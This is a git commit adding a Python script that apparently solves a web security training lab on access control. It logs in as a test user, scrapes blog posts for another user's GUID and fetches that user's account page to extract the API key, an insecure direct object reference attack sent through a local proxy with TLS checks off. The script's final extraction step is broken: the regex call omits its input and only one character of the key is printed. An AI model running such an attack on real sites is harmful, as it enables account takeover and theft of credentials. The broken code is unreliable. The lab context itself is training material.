Upload files to "lab.py"

2026-02-25 20:44:01 +00:00
commit a1f1da6203
1 changed files with 84 additions and 0 deletions
--- a/lab.py/access-control-lab06.py
+++ b/lab.py/access-control-lab06.py
@@ -0,0 +1,84 @@
+import requests
+import urllib3
+import sys
+from bs4 import BeautifulSoup
+import re
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+proxies = {"http":"127.0.0.1:8080", "https":"127.0.0.1:8080"}
+
+def get_csrf_token(s, url):
+    r = s.get(url, verify=False, proxies=proxies)
+    soup = BeautifulSoup(r.text, "html.parser")
+    csrf = soup.find("input", {"name":"csrf"})["value"]
+    return csrf
+
+def carlos_guid(s, url):
+    # Load home page
+    r= requests.get(url, verify=False, proxies=proxies)
+    res = r.text
+    post_ids = re.findall(r'postId=(\w+)"', res)
+    unique_post_ids = list(set(post_ids))
+
+    # Loop through post_ids to identify one written by carlos
+    for i in unique_post_ids:
+        r = s.get(url + "/post?postId=" + i, verify=False, proxies=proxies)
+        res = r.text
+        if "carlos" in res:
+            print("Found Carlos GUID...")
+            guid = re.findall(r"userId=(.*)'", res)[0]
+            return guid
+
+
+def carlos_api_key(s, url):
+
+    # Get CSRF token from login page
+    login_url = url + "/login"
+    print("Locating CSRF Token...")
+    csrf_token = get_csrf_token(s, login_url)
+
+    # Login
+    print("Logging in as wiener...")
+    data_login = {"csrf":csrf_token, 
+            "username":"wiener",
+            "password":"peter"}
+    r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
+    res = r.text
+    if "Log out" in res:
+        print("(+) Successfully logged in!")
+
+        # Find post with carlos GUID
+        guid = carlos_guid(s, url)
+
+        # Obtain Carlos API key
+        carlos_account_url = url + "/my-account?id=" + guid
+        r = s.get(carlos_account_url, verify=False, proxies=proxies)
+        res = r.text
+        if "carlos" in res:
+            print("Successfully accessed Carlos account")
+            print("Retrieving API key")
+            api_key = re.findall(r"Your API Key is:(.*)\<\/div\>'")[0]
+            print("API key:" + api_key[0])
+        else:
+            print("Could not access carlos account")
+            sys.exit(-1)
+
+    else:
+        print("(-) Unable to login")
+        sys.exit(-1)
+
+
+def main():
+    if len(sys.argv) != 2:
+        print("(-) Usage: python %s <url>" % sys.argv[0])
+        print("(-) Example: python %s example.com" % sys.argv[0])
+        sys.exit(-1)
+
+    s = requests.Session()
+    url = sys.argv[1]
+    carlos_api_key(s, url)
+
+
+if __name__ == "__main__":
+    main()